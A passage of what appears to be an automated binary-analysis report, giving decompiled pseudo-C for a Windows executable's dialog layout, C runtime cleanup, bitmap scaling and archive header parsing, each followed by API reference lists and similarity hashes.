          						_t221 = _a12;
          						if(_a12 == 0 && E001FCE00(_t156, _v2368.bottom, _t221, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
          							SetWindowTextW(_t186,  &_v2048);
          						}
          						L18:
          						_t205 = _t204 - GetSystemMetrics(8);
          						_t106 = GetWindow(_t186, 5);
          						_t187 = _t106;
          						_v2368.bottom = _t187;
          						if(_t156 == 0) {
          							L24:
          							return _t106;
          						}
          						_t157 = 0;
          						while(_t187 != 0) {
          							__eflags = _t157 - 0x200;
          							if(_t157 >= 0x200) {
          								goto L24;
          							}
          							GetWindowRect(_t187,  &_v2320);
          							_t170 = _v2320.top.left;
          							_t192 = 0x64;
          							asm("cdq");
          							_t193 = _v2320.left;
          							asm("cdq");
          							_t119 = (_t170 - _t205 - _v2336) * _v2368.top;
          							asm("cdq");
          							_t174 = 0x64;
          							asm("cdq");
          							asm("cdq");
          							 *0x22dfd0(_t187, 0, (_t193 - (_v2352.right - _t119 % _t174 >> 1) - _v2352.bottom) * _v2368.right / _t174, _t119 / _t174, (_v2320.right - _t193 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t170 + 1) * _v2368.top / _t192, 0x204);
          							_t106 = GetWindow(_t187, 2);
          							_t187 = _t106;
          							__eflags = _t187 - _v2384;
          							if(_t187 == _v2384) {
          								goto L24;
          							}
          							_t157 = _t157 + 1;
          							__eflags = _t157;
          						}
          						goto L24;
          					}
          					if(_a12 != 0) {
          						goto L18;
          					}
          					_t158 = 0x64;
          					asm("cdq");
          					_t134 = _v2292 * _v2368.top;
          					_t160 = _t104 * _v2368.right / _t158 + _v2352.right;
          					_v2324 = _t160;
          					asm("cdq");
          					_t185 = _t134 % _v2352.top;
          					_v2352.left = _t134 / _v2352.top + _t204;
          					asm("cdq");
          					asm("cdq");
          					_t200 = (_t191 - _v2352.left - _t185 >> 1) + _v2336;
          					_t163 = (_t169 - _t160 - _t185 >> 1) + _v2352.bottom;
          					if(_t163 < 0) {
          						_t163 = 0;
          					}
          					if(_t200 < 0) {
          						_t200 = 0;
          					}
          					 *0x22dfd0(_t186, 0, _t163, _t200, _v2324, _v2352.left,  !(GetWindowLongW(_t186, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204);
          					GetWindowRect(_t186,  &_v2368);
          					_t156 = _v2393;
          					goto L15;
          				} else {
          					_t201 = 0x22d154;
          					do {
          						if( *_t201 > 0) {
          							_t9 =  &(_t201[1]); // 0x2233e0
          							_t150 = E00215460( &_v2288,  *_t9, _t96);
          							_t207 = _t207 + 0xc;
          							if(_t150 == 0) {
          								_t12 =  &(_t201[1]); // 0x2233e0
          								if(E001FCF57(_t155, _t202, _t201,  *_t12,  &_v2048, 0x400) != 0) {
          									SetDlgItemTextW(_t186,  *_t201,  &_v2048);
          								}
          							}
          							_t96 = _v2368.top;
          						}
          						_t155 = _t155 + 1;
          						_t201 =  &(_t201[3]);
          						_t213 = _t155 -  *0x22d5f4; // 0x63
          					} while (_t213 < 0);
          					goto L8;
          				}
          			}

          APIs
          • _swprintf.LIBCMT ref: 001FD731
            • Part of subcall function 001F3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001F3E54
            • Part of subcall function 002011FA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00230078,?,001FCE91,00000000,?,00000050,00230078), ref: 00201217
          • _strlen.LIBCMT ref: 001FD752
          • SetDlgItemTextW.USER32(?,0022D154,?), ref: 001FD7B2
          • GetWindowRect.USER32(?,?), ref: 001FD7EC
          • GetClientRect.USER32(?,?), ref: 001FD7F8
          • GetWindowLongW.USER32(?,000000F0), ref: 001FD896
          • GetWindowRect.USER32(?,?), ref: 001FD8C3
          • SetWindowTextW.USER32(?,?), ref: 001FD906
          • GetSystemMetrics.USER32(00000008), ref: 001FD90E
          • GetWindow.USER32(?,00000005), ref: 001FD919
          • GetWindowRect.USER32(00000000,?), ref: 001FD946
          • GetWindow.USER32(00000000,00000002), ref: 001FD9B8
          Similarity
          • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
          • String ID: $%s:$CAPTION$d
          • API String ID: 2407758923-2512411981
          • Opcode ID: 1c8843a41c2dd0457b1deb54580d04c5740ebfe4ad4ec32dd67b8a9aca5da0c5
          • Instruction ID: 8c039b5207c253227bf2a7861a1ebef3e962abfe44ca31a57b46b53c9a664229
          • Opcode Fuzzy Hash: 1c8843a41c2dd0457b1deb54580d04c5740ebfe4ad4ec32dd67b8a9aca5da0c5
          • Instruction Fuzzy Hash: B4818071108305AFD720DFA8DD89A7FBBE9EB88704F04091DFA8597291D770A9058B52
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E0021B784(intOrPtr _a4) {
          				intOrPtr _v8;
          				intOrPtr _t25;
          				intOrPtr* _t26;
          				intOrPtr _t28;
          				intOrPtr* _t29;
          				intOrPtr* _t31;
          				intOrPtr* _t45;
          				intOrPtr* _t46;
          				intOrPtr* _t47;
          				intOrPtr* _t55;
          				intOrPtr* _t70;
          				intOrPtr _t74;
          
          				_t74 = _a4;
          				_t25 =  *((intOrPtr*)(_t74 + 0x88));
          				if(_t25 != 0 && _t25 != 0x22dd50) {
          					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
          					if(_t45 != 0 &&  *_t45 == 0) {
          						_t46 =  *((intOrPtr*)(_t74 + 0x84));
          						if(_t46 != 0 &&  *_t46 == 0) {
          							E00217A50(_t46);
          							E0021B363( *((intOrPtr*)(_t74 + 0x88)));
          						}
          						_t47 =  *((intOrPtr*)(_t74 + 0x80));
          						if(_t47 != 0 &&  *_t47 == 0) {
          							E00217A50(_t47);
          							E0021B461( *((intOrPtr*)(_t74 + 0x88)));
          						}
          						E00217A50( *((intOrPtr*)(_t74 + 0x7c)));
          						E00217A50( *((intOrPtr*)(_t74 + 0x88)));
          					}
          				}
          				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
          				if(_t26 != 0 &&  *_t26 == 0) {
          					E00217A50( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
          					E00217A50( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
          					E00217A50( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
          					E00217A50( *((intOrPtr*)(_t74 + 0x8c)));
          				}
          				E0021B8F7( *((intOrPtr*)(_t74 + 0x9c)));
          				_t28 = 6;
          				_t55 = _t74 + 0xa0;
          				_v8 = _t28;
          				_t70 = _t74 + 0x28;
          				do {
          					if( *((intOrPtr*)(_t70 - 8)) != 0x22d818) {
          						_t31 =  *_t70;
          						if(_t31 != 0 &&  *_t31 == 0) {
          							E00217A50(_t31);
          							E00217A50( *_t55);
          						}
          						_t28 = _v8;
          					}
          					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
          						_t29 =  *((intOrPtr*)(_t70 - 4));
          						if(_t29 != 0 &&  *_t29 == 0) {
          							E00217A50(_t29);
          						}
          						_t28 = _v8;
          					}
          					_t55 = _t55 + 4;
          					_t70 = _t70 + 0x10;
          					_t28 = _t28 - 1;
          					_v8 = _t28;
          				} while (_t28 != 0);
          				return E00217A50(_t74);
          			}

          APIs
          • ___free_lconv_mon.LIBCMT ref: 0021B7C8
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B380
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B392
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B3A4
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B3B6
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B3C8
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B3DA
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B3EC
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B3FE
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B410
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B422
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B434
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B446
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B458
          • _free.LIBCMT ref: 0021B7BD
            • Part of subcall function 00217A50: RtlFreeHeap.NTDLL(00000000,00000000,?,0021B4F8,?,00000000,?,00000000,?,0021B51F,?,00000007,?,?,0021B91C,?), ref: 00217A66
            • Part of subcall function 00217A50: GetLastError.KERNEL32(?,?,0021B4F8,?,00000000,?,00000000,?,0021B51F,?,00000007,?,?,0021B91C,?,?), ref: 00217A78
          • _free.LIBCMT ref: 0021B7DF
          • _free.LIBCMT ref: 0021B7F4
          • _free.LIBCMT ref: 0021B7FF
          • _free.LIBCMT ref: 0021B821
          • _free.LIBCMT ref: 0021B834
          • _free.LIBCMT ref: 0021B842
          • _free.LIBCMT ref: 0021B84D
          • _free.LIBCMT ref: 0021B885
          • _free.LIBCMT ref: 0021B88C
          • _free.LIBCMT ref: 0021B8A9
          • _free.LIBCMT ref: 0021B8C1
          Similarity
          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
          • String ID:
          • API String ID: 161543041-0
          • Opcode ID: cf407d02439e2cbb1c0219e1bdb6e6bf0d0a8685ae2c4c6ccf248b1f2ea2e44d
          • Instruction ID: bcfb633e1474cc57b484b9f90ff7cdcb90c4bd5a8e23246a9521116ab2cb2577
          • Opcode Fuzzy Hash: cf407d02439e2cbb1c0219e1bdb6e6bf0d0a8685ae2c4c6ccf248b1f2ea2e44d
          • Instruction Fuzzy Hash: B3314F315246069FEB22AE79D885BDAB3F8EF60750F215429F059D7191DF30ADE08B24
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E00218422(char _a4) {
          				char _v8;
          
          				_t26 = _a4;
          				_t52 =  *_a4;
          				if( *_a4 != 0x224be0) {
          					E00217A50(_t52);
          					_t26 = _a4;
          				}
          				E00217A50( *((intOrPtr*)(_t26 + 0x3c)));
          				E00217A50( *((intOrPtr*)(_a4 + 0x30)));
          				E00217A50( *((intOrPtr*)(_a4 + 0x34)));
          				E00217A50( *((intOrPtr*)(_a4 + 0x38)));
          				E00217A50( *((intOrPtr*)(_a4 + 0x28)));
          				E00217A50( *((intOrPtr*)(_a4 + 0x2c)));
          				E00217A50( *((intOrPtr*)(_a4 + 0x40)));
          				E00217A50( *((intOrPtr*)(_a4 + 0x44)));
          				E00217A50( *((intOrPtr*)(_a4 + 0x360)));
          				_v8 =  &_a4;
          				E002182E8(5,  &_v8);
          				_v8 =  &_a4;
          				return E00218338(4,  &_v8);
          			}

          APIs
          • _free.LIBCMT ref: 00218436
            • Part of subcall function 00217A50: RtlFreeHeap.NTDLL(00000000,00000000,?,0021B4F8,?,00000000,?,00000000,?,0021B51F,?,00000007,?,?,0021B91C,?), ref: 00217A66
            • Part of subcall function 00217A50: GetLastError.KERNEL32(?,?,0021B4F8,?,00000000,?,00000000,?,0021B51F,?,00000007,?,?,0021B91C,?,?), ref: 00217A78
          • _free.LIBCMT ref: 00218442
          • _free.LIBCMT ref: 0021844D
          • _free.LIBCMT ref: 00218458
          • _free.LIBCMT ref: 00218463
          • _free.LIBCMT ref: 0021846E
          • _free.LIBCMT ref: 00218479
          • _free.LIBCMT ref: 00218484
          • _free.LIBCMT ref: 0021848F
          • _free.LIBCMT ref: 0021849D
          Similarity
          • API ID: _free$ErrorFreeHeapLast
          • String ID: K"
          • API String ID: 776569668-584860598
          • Opcode ID: ab33542edcbc8e5da63213baf21ea8557e3d9a38dc87984084a9934a924d659c
          • Instruction ID: d34b2983566b6f5f87c4856390955af3b8728d13dc91b4c95f0f228e9d28a019
          • Opcode Fuzzy Hash: ab33542edcbc8e5da63213baf21ea8557e3d9a38dc87984084a9934a924d659c
          • Instruction Fuzzy Hash: 92117476564108FFCB01EFA4D882CDE3BB5EF54350F5151A5FA198B222DA31EBA09F80
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E0020C343(void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4) {
          				intOrPtr _v20;
          				intOrPtr _v24;
          				void _v28;
          				short _v4124;
          				void* _t10;
          				struct HWND__* _t11;
          				void* _t21;
          				void* _t28;
          				void* _t29;
          				void* _t31;
          				struct HWND__* _t34;
          				void* _t45;
          
          				_t45 = __fp0;
          				_t29 = __edx;
          				E0020D940();
          				_t10 = E0020952A(__eflags);
          				if(_t10 == 0) {
          					return _t10;
          				}
          				_t11 = GetWindow(_a4, 5);
          				_t34 = _t11;
          				_t31 = 0;
          				_a4 = _t34;
          				if(_t34 == 0) {
          					L11:
          					return _t11;
          				}
          				while(_t31 < 0x200) {
          					GetClassNameW(_t34,  &_v4124, 0x800);
          					if(E00201410( &_v4124, L"STATIC") == 0 && (GetWindowLongW(_t34, 0xfffffff0) & 0x0000001f) == 0xe) {
          						_t28 = SendMessageW(_t34, 0x173, 0, 0);
          						if(_t28 != 0) {
          							GetObjectW(_t28, 0x18,  &_v28);
          							_t21 = E0020958C(_v20);
          							SendMessageW(_t34, 0x172, 0, E0020975D(_t29, _t45, _t28, E00209549(_v24), _t21));
          							DeleteObject(_t28);
          						}
          					}
          					_t11 = GetWindow(_t34, 2);
          					_t34 = _t11;
          					if(_t34 != _a4) {
          						_t31 = _t31 + 1;
          						if(_t34 != 0) {
          							continue;
          						}
          					}
          					break;
          				}
          				goto L11;
          			}

          APIs
          • GetWindow.USER32(?,00000005), ref: 0020C364
          • GetClassNameW.USER32(00000000,?,00000800), ref: 0020C393
            • Part of subcall function 00201410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,001FACFE,?,?,?,001FACAD,?,-00000002,?,00000000,?), ref: 00201426
          • GetWindowLongW.USER32(00000000,000000F0), ref: 0020C3B1
          • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0020C3C8
          • GetObjectW.GDI32(00000000,00000018,?), ref: 0020C3DB
            • Part of subcall function 0020958C: GetDC.USER32(00000000), ref: 00209598
            • Part of subcall function 0020958C: GetDeviceCaps.GDI32(00000000,0000005A), ref: 002095A7
            • Part of subcall function 0020958C: ReleaseDC.USER32(00000000,00000000), ref: 002095B5
            • Part of subcall function 00209549: GetDC.USER32(00000000), ref: 00209555
            • Part of subcall function 00209549: GetDeviceCaps.GDI32(00000000,00000058), ref: 00209564
            • Part of subcall function 00209549: ReleaseDC.USER32(00000000,00000000), ref: 00209572
          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0020C402
          • DeleteObject.GDI32(00000000), ref: 0020C409
          • GetWindow.USER32(00000000,00000002), ref: 0020C412
          Similarity
          • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
          • String ID: STATIC
          • API String ID: 1444658586-1882779555
          • Opcode ID: ee42cbf3181ce3812a1791c191003d001a98d9b3f77bc9dcd7488e64ab86e757
          • Instruction ID: e4f8d1fcf36e75d4de8e9010c9e11c5265a4c2e2247bd2f7481ef728dd80d418
          • Opcode Fuzzy Hash: ee42cbf3181ce3812a1791c191003d001a98d9b3f77bc9dcd7488e64ab86e757
          • Instruction Fuzzy Hash: 6021C3B25603157BEB316FA49C4AFEF7A2CBB09710F105121FA02B60D3CB744A528AA4
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 93%
          			E001F200C(intOrPtr __ecx) {
          				signed int _t135;
          				void* _t137;
          				signed int _t139;
          				unsigned int _t140;
          				signed int _t144;
          				signed int _t161;
          				signed int _t164;
          				void* _t167;
          				void* _t172;
          				signed int _t175;
          				signed char _t178;
          				signed char _t179;
          				signed char _t180;
          				signed int _t182;
          				signed int _t185;
          				signed int _t187;
          				signed int _t188;
          				signed char _t220;
          				signed char _t232;
          				signed int _t233;
          				signed int _t236;
          				intOrPtr _t240;
          				signed int _t244;
          				signed int _t246;
          				signed int _t247;
          				signed int _t257;
          				signed int _t258;
          				signed char _t262;
          				signed int _t263;
          				signed int _t265;
          				intOrPtr _t272;
          				intOrPtr _t275;
          				intOrPtr _t278;
          				intOrPtr _t314;
          				signed int _t315;
          				intOrPtr _t318;
          				signed int _t322;
          				void* _t323;
          				void* _t324;
          				void* _t326;
          				void* _t327;
          				void* _t328;
          				void* _t329;
          				void* _t330;
          				void* _t331;
          				void* _t332;
          				void* _t333;
          				void* _t334;
          				intOrPtr* _t336;
          				signed int _t339;
          				void* _t340;
          				signed int _t341;
          				char* _t342;
          				void* _t343;
          				void* _t344;
          				signed int _t348;
          				signed int _t351;
          				signed int _t366;
          
          				E0020D940();
          				_t318 =  *((intOrPtr*)(_t344 + 0x20b8));
          				 *((intOrPtr*)(_t344 + 0xc)) = __ecx;
          				_t314 =  *((intOrPtr*)(_t318 + 0x18));
          				_t135 = _t314 -  *((intOrPtr*)(_t344 + 0x20bc));
          				if(_t135 <  *(_t318 + 0x1c)) {
          					L104:
          					return _t135;
          				}
          				_t315 = _t314 - _t135;
          				 *(_t318 + 0x1c) = _t135;
          				if(_t315 >= 2) {
          					_t240 =  *((intOrPtr*)(_t344 + 0x20c4));
          					while(1) {
          						_t135 = E001FC39E(_t315);
          						_t244 = _t135;
          						_t348 = _t315;
          						if(_t348 < 0 || _t348 <= 0 && _t244 == 0) {
          							break;
          						}
          						_t322 =  *(_t318 + 0x1c);
          						_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t322;
          						if(_t135 == 0) {
          							break;
          						}
          						_t351 = _t315;
          						if(_t351 > 0 || _t351 >= 0 && _t244 > _t135) {
          							break;
          						} else {
          							_t339 = _t322 + _t244;
          							 *(_t344 + 0x28) = _t339;
          							_t137 = E001FC39E(_t315);
          							_t340 = _t339 -  *(_t318 + 0x1c);
          							_t323 = _t137;
          							_t135 = _t315;
          							_t246 = 0;
          							 *(_t344 + 0x24) = _t135;
          							 *(_t344 + 0x20) = 0;
          							if(0 < 0 || 0 <= 0 && _t340 < 0) {
          								break;
          							} else {
          								if( *((intOrPtr*)(_t240 + 4)) == 1 && _t323 == 1 && _t135 == 0) {
          									 *((char*)(_t240 + 0x1e)) = 1;
          									_t232 = E001FC39E(_t315);
          									 *(_t344 + 0x1c) = _t232;
          									if((_t232 & 0x00000001) != 0) {
          										_t236 = E001FC39E(_t315);
          										if((_t236 | _t315) != 0) {
          											asm("adc eax, edx");
          											 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t236;
          											 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
          										}
          										_t232 =  *(_t344 + 0x1c);
          									}
          									if((_t232 & 0x00000002) != 0) {
          										_t233 = E001FC39E(_t315);
          										if((_t233 | _t315) != 0) {
          											asm("adc eax, edx");
          											 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t233;
          											 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
          										}
          									}
          									_t246 =  *(_t344 + 0x20);
          									_t135 =  *(_t344 + 0x24);
          								}
          								if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
          									_t366 = _t135;
          									if(_t366 > 0 || _t366 >= 0 && _t323 > 7) {
          										goto L102;
          									} else {
          										_t324 = _t323 - 1;
          										if(_t324 == 0) {
          											_t139 = E001FC39E(_t315);
          											__eflags = _t139;
          											if(_t139 == 0) {
          												_t140 = E001FC39E(_t315);
          												 *(_t240 + 0x10c1) = _t140 & 0x00000001;
          												 *(_t240 + 0x10ca) = _t140 >> 0x00000001 & 0x00000001;
          												_t144 = E001FC251(_t318) & 0x000000ff;
          												 *(_t240 + 0x10ec) = _t144;
          												__eflags = _t144 - 0x18;
          												if(_t144 > 0x18) {
          													E001F3E41(_t344 + 0x38, 0x14, L"xc%u", _t144);
          													_t257 =  *(_t344 + 0x28);
          													_t167 = _t344 + 0x40;
          													_t344 = _t344 + 0x10;
          													E001F3DEC(_t257, _t240 + 0x28, _t167);
          												}
          												E001FC300(_t318, _t240 + 0x10a1, 0x10);
          												E001FC300(_t318, _t240 + 0x10b1, 0x10);
          												__eflags =  *(_t240 + 0x10c1);
          												if( *(_t240 + 0x10c1) != 0) {
          													_t325 = _t240 + 0x10c2;
          													E001FC300(_t318, _t240 + 0x10c2, 8);
          													E001FC300(_t318, _t344 + 0x30, 4);
          													E001FF524(_t344 + 0x58);
          													E001FF56A(_t344 + 0x60, _t240 + 0x10c2, 8);
          													_push(_t344 + 0x30);
          													E001FF435(_t344 + 0x5c);
          													_t161 = E0020F3CA(_t344 + 0x34, _t344 + 0x34, 4);
          													_t344 = _t344 + 0xc;
          													asm("sbb al, al");
          													__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
          													 *(_t240 + 0x10c1) =  ~_t161 + 1;
          													if( *((intOrPtr*)(_t240 + 4)) == 3) {
          														_t164 = E0020F3CA(_t325, 0x222398, 8);
          														_t344 = _t344 + 0xc;
          														__eflags = _t164;
          														if(_t164 == 0) {
          															 *(_t240 + 0x10c1) = _t164;
          														}
          													}
          												}
          												 *((char*)(_t240 + 0x10a0)) = 1;
          												 *((intOrPtr*)(_t240 + 0x109c)) = 5;
          												 *((char*)(_t240 + 0x109b)) = 1;
          											} else {
          												E001F3E41(_t344 + 0x38, 0x14, L"x%u", _t139);
          												_t258 =  *(_t344 + 0x28);
          												_t172 = _t344 + 0x40;
          												_t344 = _t344 + 0x10;
          												E001F3DEC(_t258, _t240 + 0x28, _t172);
          											}
          											goto L102;
          										}
          										_t326 = _t324 - 1;
          										if(_t326 == 0) {
          											_t175 = E001FC39E(_t315);
          											__eflags = _t175;
          											if(_t175 != 0) {
          												goto L102;
          											}
          											_push(0x20);
          											 *((intOrPtr*)(_t240 + 0x1070)) = 3;
          											_push(_t240 + 0x1074);
          											L40:
          											E001FC300(_t318);
          											goto L102;
          										}
          										_t327 = _t326 - 1;
          										if(_t327 == 0) {
          											__eflags = _t246;
          											if(__eflags < 0) {
          												goto L102;
          											}
          											if(__eflags > 0) {
          												L65:
          												_t178 = E001FC39E(_t315);
          												 *(_t344 + 0x13) = _t178;
          												_t179 = _t178 & 0x00000001;
          												_t262 =  *(_t344 + 0x13);
          												 *(_t344 + 0x14) = _t179;
          												_t315 = _t262 & 0x00000002;
          												__eflags = _t315;
          												 *(_t344 + 0x15) = _t315;
          												if(_t315 != 0) {
          													_t278 = _t318;
          													__eflags = _t179;
          													if(__eflags == 0) {
          														E00200A64(_t240 + 0x1040, _t315, E001FC2E0(_t278, __eflags), _t315);
          													} else {
          														E00200A25(_t240 + 0x1040, _t315, E001FC29E(_t278), 0);
          													}
          													_t262 =  *(_t344 + 0x13);
          													_t179 =  *(_t344 + 0x14);
          												}
          												_t263 = _t262 & 0x00000004;
          												__eflags = _t263;
          												 *(_t344 + 0x16) = _t263;
          												if(_t263 != 0) {
          													_t275 = _t318;
          													__eflags = _t179;
          													if(__eflags == 0) {
          														E00200A64(_t240 + 0x1048, _t315, E001FC2E0(_t275, __eflags), _t315);
          													} else {
          														E00200A25(_t240 + 0x1048, _t315, E001FC29E(_t275), 0);
          													}
          												}
          												_t180 =  *(_t344 + 0x13);
          												_t265 = _t180 & 0x00000008;
          												__eflags = _t265;
          												 *(_t344 + 0x17) = _t265;
          												if(_t265 != 0) {
          													__eflags =  *(_t344 + 0x14);
          													_t272 = _t318;
          													if(__eflags == 0) {
          														E00200A64(_t240 + 0x1050, _t315, E001FC2E0(_t272, __eflags), _t315);
          													} else {
          														E00200A25(_t240 + 0x1050, _t315, E001FC29E(_t272), 0);
          													}
          													_t180 =  *(_t344 + 0x13);
          												}
          												__eflags =  *(_t344 + 0x14);
          												if( *(_t344 + 0x14) != 0) {
          													__eflags = _t180 & 0x00000010;
          													if((_t180 & 0x00000010) != 0) {
          														__eflags =  *(_t344 + 0x15);
          														if( *(_t344 + 0x15) == 0) {
          															_t341 = 0x3fffffff;
          															_t328 = 0x3b9aca00;
          														} else {
          															_t187 = E001FC29E(_t318);
          															_t341 = 0x3fffffff;
          															_t328 = 0x3b9aca00;
          															_t188 = _t187 & 0x3fffffff;
          															__eflags = _t188 - 0x3b9aca00;
          															if(_t188 < 0x3b9aca00) {
          																E002006D0(_t240 + 0x1040, _t188, 0);
          															}
          														}
          														__eflags =  *(_t344 + 0x16);
          														if( *(_t344 + 0x16) != 0) {
          															_t185 = E001FC29E(_t318) & _t341;
          															__eflags = _t185 - _t328;
          															if(_t185 < _t328) {
          																E002006D0(_t240 + 0x1048, _t185, 0);
          															}
          														}
          														__eflags =  *(_t344 + 0x17);
          														if( *(_t344 + 0x17) != 0) {
          															_t182 = E001FC29E(_t318) & _t341;
          															__eflags = _t182 - _t328;
          															if(_t182 < _t328) {
          																E002006D0(_t240 + 0x1050, _t182, 0);
          															}
          														}
          													}
          												}
          												goto L102;
          											}
          											__eflags = _t340 - 5;
          											if(_t340 < 5) {
          												goto L102;
          											}
          											goto L65;
          										}
          										_t329 = _t327 - 1;
          										if(_t329 == 0) {
          											__eflags = _t246;
          											if(__eflags < 0) {
          												goto L102;
          											}
          											if(__eflags > 0) {
          												L60:
          												E001FC39E(_t315);
          												__eflags = E001FC39E(_t315);
          												if(__eflags != 0) {
          													 *((char*)(_t240 + 0x10f3)) = 1;
          													E001F3E41(_t344 + 0x38, 0x14, L";%u", _t203);
          													_t344 = _t344 + 0x10;
          													E001FFA89(__eflags, _t240 + 0x28, _t344 + 0x30, 0x800);
          												}
          												goto L102;
          											}
          											__eflags = _t340 - 1;
          											if(_t340 < 1) {
          												goto L102;
          											}
          											goto L60;
          										}
          										_t330 = _t329 - 1;
          										if(_t330 == 0) {
          											 *((intOrPtr*)(_t240 + 0x1100)) = E001FC39E(_t315);
          											 *(_t240 + 0x2104) = E001FC39E(_t315) & 0x00000001;
          											_t331 = E001FC39E(_t315);
          											 *((char*)(_t344 + 0xc0)) = 0;
          											__eflags = _t331 - 0x1fff;
          											if(_t331 < 0x1fff) {
          												E001FC300(_t318, _t344 + 0xc4, _t331);
          												 *((char*)(_t344 + _t331 + 0xc0)) = 0;
          											}
          											E001FB9DE(_t344 + 0xc4, _t344 + 0xc4, 0x2000);
          											_push(0x800);
          											_push(_t240 + 0x1104);
          											_push(_t344 + 0xc8);
          											E00201094();
          											goto L102;
          										}
          										_t332 = _t330 - 1;
          										if(_t332 == 0) {
          											_t220 = E001FC39E(_t315);
          											 *(_t344 + 0x1c) = _t220;
          											_t342 = _t240 + 0x2108;
          											 *(_t240 + 0x2106) = _t220 >> 0x00000002 & 0x00000001;
          											 *(_t240 + 0x2107) = _t220 >> 0x00000003 & 0x00000001;
          											 *((char*)(_t240 + 0x2208)) = 0;
          											 *_t342 = 0;
          											__eflags = _t220 & 0x00000001;
          											if((_t220 & 0x00000001) != 0) {
          												_t334 = E001FC39E(_t315);
          												__eflags = _t334 - 0xff;
          												if(_t334 >= 0xff) {
          													_t334 = 0xff;
          												}
          												E001FC300(_t318, _t342, _t334);
          												_t220 =  *(_t344 + 0x1c);
          												 *((char*)(_t334 + _t342)) = 0;
          											}
          											__eflags = _t220 & 0x00000002;
          											if((_t220 & 0x00000002) != 0) {
          												_t333 = E001FC39E(_t315);
          												__eflags = _t333 - 0xff;
          												if(_t333 >= 0xff) {
          													_t333 = 0xff;
          												}
          												_t343 = _t240 + 0x2208;
          												E001FC300(_t318, _t343, _t333);
          												 *((char*)(_t333 + _t343)) = 0;
          											}
          											__eflags =  *(_t240 + 0x2106);
          											if( *(_t240 + 0x2106) != 0) {
          												 *((intOrPtr*)(_t240 + 0x2308)) = E001FC39E(_t315);
          											}
          											__eflags =  *(_t240 + 0x2107);
          											if( *(_t240 + 0x2107) != 0) {
          												 *((intOrPtr*)(_t240 + 0x230c)) = E001FC39E(_t315);
          											}
          											 *((char*)(_t240 + 0x2105)) = 1;
          											goto L102;
          										}
          										if(_t332 != 1) {
          											goto L102;
          										}
          										if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t318 + 0x18)) -  *(_t344 + 0x28) == 1) {
          											_t340 = _t340 + 1;
          										}
          										_t336 = _t240 + 0x1028;
          										E001F1EDE(_t336, _t340);
          										_push(_t340);
          										_push( *_t336);
          										goto L40;
          									}
          								} else {
          									L102:
          									_t247 =  *(_t344 + 0x28);
          									 *(_t318 + 0x1c) = _t247;
          									_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t247;
          									if(_t135 >= 2) {
          										continue;
          									}
          									break;
          								}
          							}
          						}
          					}
          				}
          			}


          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID: ;%u$x%u$xc%u
          • API String ID: 0-2277559157
          • Opcode ID: 4b85fa523e04cbe120e5c20ceaa0ecce9f7d25a0dcfe5e86e8af7eda00b33c79
          • Instruction ID: a7e0a7be31b3f11f3d496fd5987fd8eeb2d6ff8c14af6f3c5739e858a2f5d940
